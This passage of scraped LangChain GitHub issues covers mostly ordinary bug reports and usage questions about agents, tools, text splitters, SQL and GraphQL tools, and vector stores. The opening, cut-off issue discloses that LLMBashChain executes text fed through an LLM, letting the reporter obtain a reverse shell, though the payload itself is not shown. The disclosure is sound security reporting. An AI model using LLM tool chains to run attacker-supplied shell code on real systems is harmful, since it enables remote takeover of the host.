bash_chain = LLMBashChain.from_llm(llm, verbose=True)
bash_chain.run(text)
```
3. You receive a reverse shell on the listener.
### Expected behavior
The bash chain is clearly vulnerable. I think it should print a warning or block the execution, but it just executes my script. This chain is dangerous to use in production, isn't it? | BashChain allows Remote Control Execution. | https://api.github.com/repos/langchain-ai/langchain/issues/7463/comments | 1 | 2023-07-10T06:43:43Z | 2023-10-16T16:05:34Z | https://github.com/langchain-ai/langchain/issues/7463 | 1,796,085,216 | 7463 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.208 python==3.10.12 linux==Ubuntu 20.04.6 LTS
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
from langchain.llms import OpenAI
from langchain.chains import ConversationChain
from langchain.memory import ConversationBufferMemory

llm = OpenAI(model="text-davinci-003", temperature=0)
conversation = ConversationChain(
    llm=llm,
    verbose=True,
    memory=ConversationBufferMemory()
)

# Start the conversation
conversation.predict(input="Tell me about yourself.")

# Continue the conversation
conversation.predict(input="What can you do?")
conversation.predict(input="How can you help me with data analysis?")

# Display the conversation
print(conversation)
```
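The exposure can also be seen directly — the resolved key ends up as a plain str attribute on the wrapped model (a one-line sketch):
```python
print(conversation.llm.openai_api_key)  # prints the raw key, even when it came from the env
```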
### Expected behavior
OpenAI should read openai_api_key from the environment and not let it leak as a plain string when the ConversationChain (with its ConversationBufferMemory) is printed. | openai_api_key stored as string | https://api.github.com/repos/langchain-ai/langchain/issues/7462/comments | 2 | 2023-07-10T06:32:59Z | 2023-10-16T16:05:39Z | https://github.com/langchain-ai/langchain/issues/7462 | 1,796,067,285 | 7462 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hello everyone!
I'm trying to use an LLM to consult data from the Open Targets Platform (they provide information about diseases and their links with molecules, etc.). They have an endpoint that can be accessed using GraphQL. The Open Targets Platform has several query structures for different kinds of data requests. In the following example I give the model 3 different query structures:
```python
from langchain import OpenAI
from langchain.agents import load_tools, initialize_agent, AgentType, Tool
from langchain.utilities import GraphQLAPIWrapper
from langchain.prompts import PromptTemplate
from langchain.chains import LLMChain
# 1.1) Promt Template (in case we need to make a prompt engineering)
prompt = PromptTemplate(
input_variables=["query"],
template="{query}"
)
# 1.2) LLM Model , in this case a LLM modelo from OpenAI
llm = OpenAI(openai_api_key="YOURKEY",
model_name="gpt-3.5-turbo", temperature=0.85)
# 1.3) Creation of the chain object (integrates the llm and the prompt template)
llm_chain = LLMChain(llm=llm, prompt=prompt)
# 2.1) We set up the LLM as a tool in order to answer general questions
llm_tool = Tool(name='Language Model',
func=llm_chain.run,
description='use this tool for general purpose queries and logic')
# 2.2) We set up the graphql tool
graph_tool = load_tools( # IMPORTANT: we use load_tools because graphql is already a built-in LangChain tool
tool_names = ["graphql"],
graphql_endpoint="https://api.platform.opentargets.org/api/v4/graphql",
llm=llm)
# 2.3) List of tools that the agent will take
tools = [llm_tool, graph_tool[0]]
agent = initialize_agent(
agent="zero-shot-react-description", # Type of agent
    tools=tools, # the tools I give it
llm=llm,
verbose=True,
max_iterations=3)
# IMPORTANT: The zero-shot ReAct agent has no memory; every answer it gives covers just one question. If you want an agent with memory you have to use another agent type, such as Conversational ReAct
type(agent)
prefix = "This questions are related to get medical information, specifically data from OpenTargetPlatform, " \
"If the question is about the relation among a target and a diseases use the query TargetDiseases, " \
"If the question is about the relation among diseases and targets then use the query DiseasesTargets, " \
"If the question request evidence between a disease and targets then use the query targetDiseaseEvidence"
graphql_fields = """
query TargetDiseases {
target(ensemblId: "target") {
id
approvedSymbol
associatedDiseases {
count
rows {
disease {
id
name
}
datasourceScores {
id
score
}
}
}
}
}
query DiseasesTargets {
disease(efoId: "disease") {
id
name
associatedTargets {
count
rows {
target {
id
approvedSymbol
}
score
}
}
}
}
query targetDiseaseEvidence {
disease(efoId: "disease") {
id
name
evidences(datasourceIds: ["intogen"], ensemblIds: ["target"]) {
count
rows {
disease {
id
name
}
diseaseFromSource
target {
id
approvedSymbol
}
mutatedSamples {
functionalConsequence {
id
label
}
numberSamplesTested
numberMutatedSamples
}
resourceScore
significantDriverMethods
cohortId
cohortShortName
cohortDescription
}
}
}
}
"""
suffix = "What are the targets of vorinostat?"
#answer= agent.run(prefix+ suffix + graphql_fields)
answer= agent.run(suffix + prefix+ graphql_fields)
answer
```
When I have 2 query structures it works well. However, when I add the third one, as in this example, different kinds of errors start to show.
Any recommendation about this? Should I separate the query structures, or is the order of elements in my agent wrong?
I would appreciate your help so much!
Orlando
### Suggestion:
_No response_ | Help using GraphQL tool | https://api.github.com/repos/langchain-ai/langchain/issues/7459/comments | 1 | 2023-07-10T05:22:54Z | 2023-10-16T16:05:45Z | https://github.com/langchain-ai/langchain/issues/7459 | 1,795,972,865 | 7,459 |
[
"hwchase17",
"langchain"
]
| Hi there,
I am new to LangChain and I ran into a problem when importing `langchain.agents`.
I run `main.py` as follows:
```python
# main.py
# python main.py
import os
os.environ["OPENAI_API_KEY"]="my key"
import langchain.agents
```
Some errors occur:
```
Traceback (most recent call last):
File "F:\LLM_publichousing\me\main.py", line 6, in <module>
import langchain.agents
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\__init__.py", line 6, in <module>
from langchain.agents import MRKLChain, ReActChain, SelfAskWithSearchChain
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\agents\__init__.py", line 2, in <module>
from langchain.agents.agent import (
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\agents\agent.py", line 16, in <module>
from langchain.agents.tools import InvalidTool
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\agents\tools.py", line 8, in <module>
from langchain.tools.base import BaseTool, Tool, tool
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\tools\__init__.py", line 3, in <module>
from langchain.tools.arxiv.tool import ArxivQueryRun
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\tools\arxiv\tool.py", line 12, in <module>
from langchain.utilities.arxiv import ArxivAPIWrapper
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\utilities\__init__.py", line 3, in <module>
from langchain.utilities.apify import ApifyWrapper
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\utilities\apify.py", line 5, in <module>
from langchain.document_loaders import ApifyDatasetLoader
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\document_loaders\__init__.py", line 54, in <module>
from langchain.document_loaders.github import GitHubIssuesLoader
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\document_loaders\github.py", line 37, in <module>
class GitHubIssuesLoader(BaseGitHubLoader):
File "pydantic\main.py", line 197, in pydantic.main.ModelMetaclass.__new__
File "pydantic\fields.py", line 506, in pydantic.fields.ModelField.infer
File "pydantic\fields.py", line 436, in pydantic.fields.ModelField.__init__
File "pydantic\fields.py", line 552, in pydantic.fields.ModelField.prepare
File "pydantic\fields.py", line 663, in pydantic.fields.ModelField._type_analysis
File "pydantic\fields.py", line 808, in pydantic.fields.ModelField._create_sub_type
File "pydantic\fields.py", line 436, in pydantic.fields.ModelField.__init__
File "pydantic\fields.py", line 552, in pydantic.fields.ModelField.prepare
File "pydantic\fields.py", line 668, in pydantic.fields.ModelField._type_analysis
File "C:\ProgramData\Anaconda3\envs\ly\lib\typing.py", line 852, in __subclasscheck__
return issubclass(cls, self.__origin__)
TypeError: issubclass() arg 1 must be a class
```
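In case it helps triage — the failure is inside pydantic's field analysis of a typing construct on Python 3.9, so the versions of the typing stack are probably relevant (a small diagnostic sketch):
```python
import sys, pydantic, typing_extensions
print(sys.version)
print(pydantic.VERSION)
print(typing_extensions.__version__)  # may be absent on very old typing_extensions releases
```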
The langchain version is `0.0.228`
My system is Windows 10. | Error occurs when `import langchain.agents` | https://api.github.com/repos/langchain-ai/langchain/issues/7458/comments | 6 | 2023-07-10T04:43:44Z | 2023-10-21T16:07:20Z | https://github.com/langchain-ai/langchain/issues/7458 | 1,795,933,159 | 7,458 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain 0.0.228
python 3.11.1
LLM: self hosting llm using [text-generation-inference](https://github.com/huggingface/text-generation-inference)
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
There is a Sample Input in the description for `InfoSQLDatabaseTool` ([this line](https://github.com/hwchase17/langchain/blob/560c4dfc98287da1bc0cfc1caebbe86d1e66a94d/langchain/agents/agent_toolkits/sql/toolkit.py#L48C18-L48C18)), and that Sample Input wraps the table names in a pair of single quotes, which misleads the LLM into also wrapping its Action Input in single quotes.
An example of the LLM behaviour:
```console
$ agent_executor.run("According to the titanic table, how many people survived?")
> Entering new chain...
Action: sql_db_list_tables
Action Input:
Observation: aix_role, aix_user, chat, client_info, dataset, dataset_version, oauth2_authorization, oauth2_authorization_consent, oauth2_registered_client, titanic, user_role
Thought:The titanic table seems relevant, I should query the schema for it.
Action: sql_db_schema
Action Input: 'titanic'
Observation: Error: table_names {"'titanic'"} not found in database
Thought:I should list all the tables in the database first.
Action: sql_db_list_tables
Action Input:
Observation: aix_role, aix_user, chat, client_info, dataset, dataset_version, oauth2_authorization, oauth2_authorization_consent, oauth2_registered_client, titanic, user_role
Thought:The titanic table is in the database, I should query the schema for it.
Action: sql_db_schema
Action Input: 'titanic'
Observation: Error: table_names {"'titanic'"} not found in database
```
And this example is more clear (note the Action Input):
```console
$ agent_executor.run("When is the last dataset created?")
> Entering new chain...
Action: sql_db_list_tables
Action Input:
Observation: aix_role, aix_user, chat, client_info, dataset, dataset_version, oauth2_authorization, oauth2_authorization_consent, oauth2_registered_client, titanic, user_role
Thought:The 'dataset' and 'dataset_version' tables seem relevant. I should query the schema for these tables.
Action: sql_db_schema
Action Input: 'dataset, dataset_version'
Observation: Error: table_names {"dataset_version'", "'dataset"} not found in database
```
After removing the quotes around the Example Input the SQL Agent works fine now.
### Expected behavior
The Action Input of `InfoSQLDatabaseTool` should be a list of table names, not a quoted str. | The single quote in Example Input of SQLDatabaseToolkit will mislead LLM | https://api.github.com/repos/langchain-ai/langchain/issues/7457/comments | 16 | 2023-07-10T04:17:49Z | 2024-02-14T16:13:03Z | https://github.com/langchain-ai/langchain/issues/7457 | 1,795,907,276 | 7,457 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.195
python==3.9.17
system-info==ubuntu
### Who can help?
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [X] Async
### Reproduction
Copy paste this code:
```
async def csv_qa(question):
agent = create_csv_agent(OpenAI(temperature=0),
'path_to_csv',
verbose=True)
answer = await agent.arun(question)
return answer
response = await csv_qa("question_about_csv")
```
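A possible stopgap until the Python REPL tool gains an async `_arun` — run the sync agent in a worker thread (sketch):
```python
import asyncio

async def csv_qa(question):
    agent = create_csv_agent(OpenAI(temperature=0), 'path_to_csv', verbose=True)
    loop = asyncio.get_running_loop()
    return await loop.run_in_executor(None, agent.run, question)
```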
### Expected behavior
Will return the same response as using `run`:
```
def csv_qa(question):
agent = create_csv_agent(OpenAI(temperature=0),
'path_to_csv',
verbose=True)
answer = agent.run(question)
return answer
response = csv_qa("question_about_csv")
``` | Getting ` NotImplementedError: PythonReplTool does not support async` when trying to use `arun` on CSV agent | https://api.github.com/repos/langchain-ai/langchain/issues/7455/comments | 3 | 2023-07-10T02:48:11Z | 2024-02-14T16:13:08Z | https://github.com/langchain-ai/langchain/issues/7455 | 1,795,819,951 | 7,455 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain: 0.0.208
platform: win 10
python: 3.9.
The warning message is: `Created a chunk of size 374, which is longer than the specified 100`.
### Who can help?
@hwchase17 @eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
**Step 1: run the code snippet below:**
```python
from langchain.document_loaders import TextLoader
from langchain.text_splitter import CharacterTextSplitter

text = '''
Google opens up its AI language model PaLM to challenge OpenAI and GPT-3
Google is offering developers access to one of its most advanced AI language models: PaLM.
The search giant is launching an API for PaLM alongside a number of AI enterprise tools
it says will help businesses “generate text, images, code, videos, audio, and more from
simple natural language prompts.”
PaLM is a large language model, or LLM, similar to the GPT series created by OpenAI or
Meta’s LLaMA family of models. Google first announced PaLM in April 2022. Like other LLMs,
PaLM is a flexible system that can potentially carry out all sorts of text generation and
editing tasks. You could train PaLM to be a conversational chatbot like ChatGPT, for
example, or you could use it for tasks like summarizing text or even writing code.
(It’s similar to features Google also announced today for its Workspace apps like Google
Docs and Gmail.)'''

with open('test.txt', 'w') as f:
    f.write(text)

loader = TextLoader('test.txt')
docs_from_file = loader.load()
print(docs_from_file)

text_splitter1 = CharacterTextSplitter(chunk_size=100, chunk_overlap=20)
docs = text_splitter1.split_documents(docs_from_file)
print(docs)
print(len(docs))
```
**Step 2:** observe that the text is not split into chunks of the expected size.
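If I understand CharacterTextSplitter correctly, it splits only on its single separator (`"\n\n"` by default) and keeps any piece between separators whole even when it exceeds chunk_size — which is exactly what the warning reports. Two sketches that should actually enforce the size:
```python
# split on single newlines instead of the default "\n\n"
text_splitter2 = CharacterTextSplitter(separator="\n", chunk_size=100, chunk_overlap=20)

# or fall back through separators until chunks fit
from langchain.text_splitter import RecursiveCharacterTextSplitter
text_splitter3 = RecursiveCharacterTextSplitter(chunk_size=100, chunk_overlap=20)
docs = text_splitter3.split_documents(docs_from_file)
```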
### Expected behavior
It should split the document into chunks no larger than chunk_size. | 'chunk_size' doesnt work on 'split_documents' function | https://api.github.com/repos/langchain-ai/langchain/issues/7452/comments | 2 | 2023-07-10T00:33:09Z | 2023-07-13T00:41:21Z | https://github.com/langchain-ai/langchain/issues/7452 | 1,795,665,180 | 7452 |
[
"hwchase17",
"langchain"
]
| Adding a unit test for any experimental module in the standard location, such as `tests/unit_tests/experimental/test_baby_agi.py`, leads to this failing unit test:
```python
../tests/unit_tests/output_parsers/test_base_output_parser.py ...................................F
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> traceback >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    def test_all_subclasses_implement_unique_type() -> None:
        types = defaultdict(list)
        for cls in _NON_ABSTRACT_PARSERS:
            try:
                types[cls._type].append(cls.__name__)
            except NotImplementedError:
                # This is handled in the previous test
                pass
        dups = {t: names for t, names in types.items() if len(names) > 1}
>       assert not dups, f"Duplicate types: {dups}"
E AssertionError: Duplicate types: {<property object at 0xffff9126e7f0>: ['EnumOutputParser', 'AutoGPTOutputParser', 'NoOutputParser', 'StructuredQueryOutputParser', 'PlanningOutputParser'], <property object at 0xffff7f331710>: ['PydanticOutputParser', 'LineListOutputParser']}
E assert not {<property object at 0xffff9126e7f0>: ['EnumOutputParser', 'AutoGPTOutputParser', 'NoOutputParser', 'StructuredQueryOu...arser', 'PlanningOutputParser'], <property object at 0xffff7f331710>: ['PydanticOutputParser', 'LineListOutputParser']}
../tests/unit_tests/output_parsers/test_base_output_parser.py:55: AssertionError
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> entering PDB >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> PDB post_mortem >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
> /workspaces/tests/unit_tests/output_parsers/test_base_output_parser.py(55)test_all_subclasses_implement_unique_type()
-> assert not dups, f"Duplicate types: {dups}"
```
[Repro is here](https://github.com/borisdev/langchain/pull/12) and [artifact here](https://github.com/borisdev/langchain/actions/runs/5502599425/jobs/10026958854?pr=12).
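For what it's worth, a minimal sketch of why the duplicate keys print as `<property object at ...>` rather than strings (an inference from the traceback, assuming the listed parsers inherit `_type` as a property and the test reads it off the class instead of an instance):

```python
class Base:
    @property
    def _type(self) -> str:
        raise NotImplementedError

class A(Base): ...
class B(Base): ...

# Accessing a property on the class (not an instance) returns the descriptor
# itself, so every subclass that does not override `_type` shares one dict key.
print(A._type is B._type)  # True
```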
| Issue: Unable to add a unit test for experimental modules | https://api.github.com/repos/langchain-ai/langchain/issues/7451/comments | 5 | 2023-07-10T00:09:26Z | 2023-10-10T17:06:29Z | https://github.com/langchain-ai/langchain/issues/7451 | 1,795,646,919 | 7,451 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain: latest, python 3.10.10
This script writes the content to the file initially, but a flawed step follows when the agent tries to "close" the file. I've extracted the relevant log below. For some reason, the agent assumes that submitting an empty text input with `append` set to false will leave the previous contents intact, but that assumption is false. The agent should set `append: true` (or skip the write entirely) to ensure the file contents are preserved. The result is that the file is written with the contents and then the contents are deleted during this step.
Observation: File written successfully to hello.txt.
Thought:Since the previous steps indicate that the haiku has already been written to the file "hello.txt", the next step is to close the file. To do that, I can use the `write_file` tool with an empty text input and the `append` parameter set to `false`. This will ensure that the file is closed without making any changes to its contents.
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "",
"append": false
}
}
```
Observation: File written successfully to hello.txt.
Thought:The file "hello.txt" has been successfully closed.
> Finished chain.
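For reference, a sketch of the write tool's actual semantics (assuming `WriteFileTool` from `langchain.tools.file_management`, where `append=False` truncates the file and `append=True` preserves it):

```python
from langchain.tools.file_management import WriteFileTool

tool = WriteFileTool(root_dir="scratch")  # assumes ./scratch exists
tool.run({"file_path": "hello.txt", "text": "first line\n"})            # creates/overwrites
tool.run({"file_path": "hello.txt", "text": "more\n", "append": True})  # keeps existing contents
tool.run({"file_path": "hello.txt", "text": "", "append": False})       # truncates to empty
```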
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Code:
```
from dotenv import find_dotenv, load_dotenv
import os
from langchain.chat_models import ChatOpenAI
from langchain.experimental.plan_and_execute import PlanAndExecute, load_agent_executor, load_chat_planner
from langchain.agents.tools import Tool
from helpers import project_root
from langchain.agents.agent_toolkits import FileManagementToolkit
from tempfile import TemporaryDirectory
load_dotenv(find_dotenv())
OPENAI_API_KEY = os.environ["OPENAI_API_KEY"]
model=ChatOpenAI(temperature=0, model="gpt-3.5-turbo")
tools = FileManagementToolkit(
root_dir=str(project_root('scratch')),
selected_tools=["read_file", "write_file", "list_directory"]).get_tools()
read_tool, write_tool, list_tool = tools
planner = load_chat_planner(model)
executor = load_agent_executor(model, tools, verbose=True)
agent = PlanAndExecute(planner=planner, executor=executor, verbose=True)
agent.run("Write a short haiku about the ocean and save it to file 'hello.txt'")
```
Output:
> Entering new chain...
steps=[Step(value='Create a string variable to store the haiku about the ocean.'), Step(value="Open a file named 'hello.txt' in write mode."), Step(value='Write the haiku to the file.'), Step(value='Close the file.'), Step(value="Given the above steps taken, respond to the user's original question.\n\n")]
> Entering new chain...
Action:
```
{
"action": "Final Answer",
"action_input": "ocean_haiku = 'Waves crash on the shore\nSeagulls soar in the blue sky\nOcean's beauty shines'"
}
```
> Finished chain.
*****
Step: Create a string variable to store the haiku about the ocean.
Response: ocean_haiku = 'Waves crash on the shore
Seagulls soar in the blue sky
Ocean's beauty shines'
> Entering new chain...
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": ""
}
}
```
Observation: File written successfully to hello.txt.
Thought:Since the file was successfully opened in write mode, I can now proceed to write the haiku about the ocean to the file.
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "Waves crash on the shore\nSeagulls soar in the blue sky\nOcean's beauty shines"
}
}
```
Observation: File written successfully to hello.txt.
Thought:The haiku about the ocean has been successfully written to the file "hello.txt". I can now proceed to the next step.
> Finished chain.
*****
Step: Open a file named 'hello.txt' in write mode.
Response: The haiku about the ocean has been successfully written to the file "hello.txt". I can now proceed to the next step.
> Entering new chain...
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "Waves crash on the shore\nSeagulls soar in the blue sky\nOcean's beauty shines",
"append": true
}
}
```
Observation: File written successfully to hello.txt.
Thought:Since the haiku has already been written to the file "hello.txt", I can proceed to the next step.
> Finished chain.
*****
Step: Write the haiku to the file.
Response: Since the haiku has already been written to the file "hello.txt", I can proceed to the next step.
> Entering new chain...
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "",
"append": false
}
}
```
Observation: File written successfully to hello.txt.
Thought:Since the previous steps indicate that the haiku has already been written to the file "hello.txt", the next step is to close the file. To do that, I can use the `write_file` tool with an empty text input and the `append` parameter set to `false`. This will ensure that the file is closed without making any changes to its contents.
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "",
"append": false
}
}
```
Observation: File written successfully to hello.txt.
Thought:The file "hello.txt" has been successfully closed.
> Finished chain.
*****
Step: Close the file.
Response: The file "hello.txt" has been successfully closed.
> Entering new chain...
Action:
```
{
"action": "Final Answer",
"action_input": "The haiku about the ocean has been successfully written to the file 'hello.txt'."
}
```
> Finished chain.
### Expected behavior
I would expect the file to be populated with the haiku instead of being empty. | write_tool logic is off | https://api.github.com/repos/langchain-ai/langchain/issues/7450/comments | 2 | 2023-07-09T23:18:56Z | 2023-10-16T16:05:54Z | https://github.com/langchain-ai/langchain/issues/7450 | 1,795,626,027 | 7,450 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
We shouldn't have to sign up for another API just to follow the quickstart tutorial. Please replace this with something that doesn't require sign-up.
### Idea or request for content:
Proposal: Use `http://api.duckduckgo.com/?q=x&format=json`
Example:
`http://api.duckduckgo.com/?q=langchain&format=json`
`{"Abstract":"LangChain is a framework designed to simplify the creation of applications using large language models. As a language model integration framework, LangChain's use-cases largely overlap with those of language models in general, including document analysis and summarization, chatbots, and code analysis.","AbstractSource":"Wikipedia","AbstractText":"LangChain is a framework designed to simplify the creation of applications using large language models. As a language model integration framework, LangChain's use-cases largely overlap with those of language models in general, including document analysis and summarization, chatbots, and code analysis.","AbstractURL":"https://en.wikipedia.org/wiki/LangChain","Answer":"","AnswerType":"","Definition":"","DefinitionSource":"","DefinitionURL":"","Entity":"software","Heading":"LangChain","Image":"/i/d6fad29d.png","ImageHeight":270,"ImageIsLogo":1,"ImageWidth":529,"Infobox":{"content":[{"data_type":"string","label":"Developer(s)","value":"Harrison Chase","wiki_order":0},{"data_type":"string","label":"Initial release","value":"October 2022","wiki_order":1},{"data_type":"string","label":"Repository","value":"github.com/hwchase17/langchain","wiki_order":2},{"data_type":"string","label":"Written in","value":"Python and JavaScript","wiki_order":3},{"data_type":"string","label":"Type","value":"Software framework for large language model application development","wiki_order":4},{"data_type":"string","label":"License","value":"MIT License","wiki_order":5},{"data_type":"string","label":"Website","value":"LangChain.com","wiki_order":6},{"data_type":"twitter_profile","label":"Twitter profile","value":"langchainai","wiki_order":"102"},{"data_type":"instance","label":"Instance of","value":{"entity-type":"item","id":"Q7397","numeric-id":7397},"wiki_order":"207"},{"data_type":"official_website","label":"Official Website","value":"https://langchain.com/","wiki_order":"208"}],"meta":[{"data_type":"string","label":"article_title","value":"LangChain"},{"data_type":"string","label":"template_name","value":"infobox software"}]},"Redirect":"","RelatedTopics":[{"FirstURL":"https://duckduckgo.com/c/Software_frameworks","Icon":{"Height":"","URL":"","Width":""},"Result":"<a href=\"https://duckduckgo.com/c/Software_frameworks\">Software frameworks</a>","Text":"Software frameworks"},{"FirstURL":"https://duckduckgo.com/c/Artificial_intelligence","Icon":{"Height":"","URL":"","Width":""},"Result":"<a href=\"https://duckduckgo.com/c/Artificial_intelligence\">Artificial intelligence</a>","Text":"Artificial intelligence"}],"Results":[{"FirstURL":"https://langchain.com/","Icon":{"Height":16,"URL":"/i/langchain.com.ico","Width":16},"Result":"<a href=\"https://langchain.com/\"><b>Official site</b></a><a href=\"https://langchain.com/\"></a>","Text":"Official site"}],"Type":"A","meta":{"attribution":null,"blockgroup":null,"created_date":null,"description":"Wikipedia","designer":null,"dev_date":null,"dev_milestone":"live","developer":[{"name":"DDG Team","type":"ddg","url":"http://www.duckduckhack.com"}],"example_query":"nikola 
tesla","id":"wikipedia_fathead","is_stackexchange":null,"js_callback_name":"wikipedia","live_date":null,"maintainer":{"github":"duckduckgo"},"name":"Wikipedia","perl_module":"DDG::Fathead::Wikipedia","producer":null,"production_state":"online","repo":"fathead","signal_from":"wikipedia_fathead","src_domain":"en.wikipedia.org","src_id":1,"src_name":"Wikipedia","src_options":{"directory":"","is_fanon":0,"is_mediawiki":1,"is_wikipedia":1,"language":"en","min_abstract_length":"20","skip_abstract":0,"skip_abstract_paren":0,"skip_end":"0","skip_icon":0,"skip_image_name":0,"skip_qr":"","source_skip":"","src_info":""},"src_url":null,"status":"live","tab":"About","topic":["productivity"],"unsafe":0}}` | DOC: Please replace SERP_API examples with an alternative | https://api.github.com/repos/langchain-ai/langchain/issues/7448/comments | 1 | 2023-07-09T21:52:15Z | 2023-10-08T23:09:17Z | https://github.com/langchain-ai/langchain/issues/7448 | 1,795,579,900 | 7,448 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
https://python.langchain.com/docs/modules/data_connection/vectorstores/integrations/supabase
Under "-- Create a table to store your documents", the `id` column is declared as `bigserial`, but ten lines down, where the matching function is created, it is referenced as `uuid`.
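For illustration, a sketch of the table with the two declarations made consistent (assuming the remaining columns from the linked guide: pgvector enabled, with content, metadata, and a 1536-dimension embedding):

```sql
-- declare id as uuid so it matches the type the matching function expects
create table documents (
  id uuid primary key,
  content text,
  metadata jsonb,
  embedding vector(1536)
);
```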
### Idea or request for content:
It is currently
`id bigserial primary key,`
Changing it to this fixed the error I was getting:
`id uuid primary key,` | DOC: Table creation for Supabase (Postgres) has incorrect type | https://api.github.com/repos/langchain-ai/langchain/issues/7446/comments | 3 | 2023-07-09T20:33:00Z | 2023-08-11T00:15:17Z | https://github.com/langchain-ai/langchain/issues/7446 | 1,795,552,337 | 7,446 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain ==0.0.228, watchdog==3.0.0, streamlit==1.24.0, databutton==0.34.0, ipykernel==6.23.3
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce the error:
1. Tried to use `from langchain.experimental import BabyAGI` with a FAISS vector store and got the error: `ValueError: Tried to add ids that already exist: {'result_1'}`.
2. Tried the code directly from the LangChain docs (https://python.langchain.com/docs/use_cases/agents/baby_agi) and got the same error.
Code:
```python
import os
import databutton as db  # assumption: `db.secrets` below is databutton's secrets store (databutton is in the listed environment)

from langchain.chat_models import AzureChatOpenAI
from langchain.embeddings.cohere import CohereEmbeddings
import faiss
from langchain.vectorstores import FAISS
from langchain.docstore import InMemoryDocstore
from langchain import OpenAI
from langchain.experimental import BabyAGI

BASE_URL = "https://openaielle.openai.azure.com/"
API_KEY = db.secrets.get("AZURE_OPENAI_KEY")
DEPLOYMENT_NAME = "GPT35turbo"

llm = AzureChatOpenAI(
    openai_api_base=BASE_URL,
    openai_api_version="2023-03-15-preview",
    deployment_name=DEPLOYMENT_NAME,
    openai_api_key=API_KEY,
    openai_api_type="azure",
    streaming=True,
    verbose=True,
